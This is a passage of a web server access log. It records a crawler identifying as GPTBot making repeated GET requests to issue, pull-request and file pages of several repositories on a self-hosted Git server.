3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py?display=source" [Client 74.7.227.38] [Length 17368] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:19:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11309] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:19:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" +[17/Feb/2026:19:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol" [Client 74.7.227.38] [Length 49765] [Gzip 12.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:19:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 